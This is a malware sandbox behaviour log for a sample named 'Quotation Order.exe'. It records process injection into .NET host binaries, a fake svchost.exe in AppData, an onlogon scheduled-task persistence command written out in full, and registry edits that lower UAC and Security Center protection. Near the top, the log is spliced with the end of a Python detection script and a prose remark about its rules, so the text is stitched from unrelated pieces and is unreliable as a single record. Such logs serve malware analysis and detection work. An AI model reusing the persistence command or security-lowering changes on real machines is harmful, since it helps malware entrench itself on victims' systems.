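Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
"""

FINDINGS = analyse(SAMPLE)   # one tuple per distinct indicator in the sample
```

Feeding the full behaviour section to analyse() gives the same set of findings with higher repeat counts collapsed; the legitimate C:\Windows\System32\svchost.exe that spawns WerFault.exe for the crashed hosts produces nothing, which is the check that keeps the svchost.exe name rule from firing on every machine.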
Source: C:\Users\user\Desktop\Quotation Order.exe Queries volume information: C:\Users\user\Desktop\Quotation Order.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Queries volume information: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Quotation Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
